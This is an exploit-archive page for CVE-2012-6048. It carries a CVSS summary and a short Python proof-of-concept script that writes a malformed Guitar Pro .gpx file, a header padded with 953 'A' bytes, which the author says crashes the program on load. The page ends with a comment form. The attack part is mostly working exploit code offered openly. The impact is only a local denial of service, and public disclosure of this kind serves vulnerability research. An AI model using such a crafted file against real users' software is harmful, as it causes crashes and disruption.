Guitar Pro 6.1.1 r10791 (.gpx) Denial of Service Exploit

2012-05-06 / 2012-11-28

Credit: condis

Risk: Low

Local: Yes

Remote: No

CVE: CVE-2012-6048

CWE: CWE-400

CVSS Base Score: 5/10

Impact Subscore: 2.9/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: None

Integrity impact: None

Availability impact: Partial

#!/usr/bin/python

# ---------------------------------------------------------
# Guitar Pro 6.1.1 r10791 (.gpx) Denial of Service Exploit
# found by condis
# 
# Date      : 01 May 2012 AD
# Tested on : Windows XP Professional SP3 PL
#
# Download  : http://www.guitar-pro.com/en/index.php
# Price     : ~60 euro
#
# Description :
#
# Each load of malformated file into the program ends up 
# with crash, but place of crash and registers values 
# differ every time o_O"
#  
# In my opinion, this bug does not allow for anything else 
# except getting to a DoS situation, therefore no further 
# research was done.
# ---------------------------------------------------------

evil  = "BCFZ\x04\x10\x01\x00"
evil += "A" * 953

file = open('ogonek_and_cooh_-_not_my_type.gpx', 'w')
file.write(evil)
file.close()

print "Sex, drugs & drum'n'bass!"

References:

http://www.guitar-pro.com/en/index.php

http://cond.psychodela.pl

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Guitar Pro 6.1.1 r10791 (.gpx) Denial of Service Exploit

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.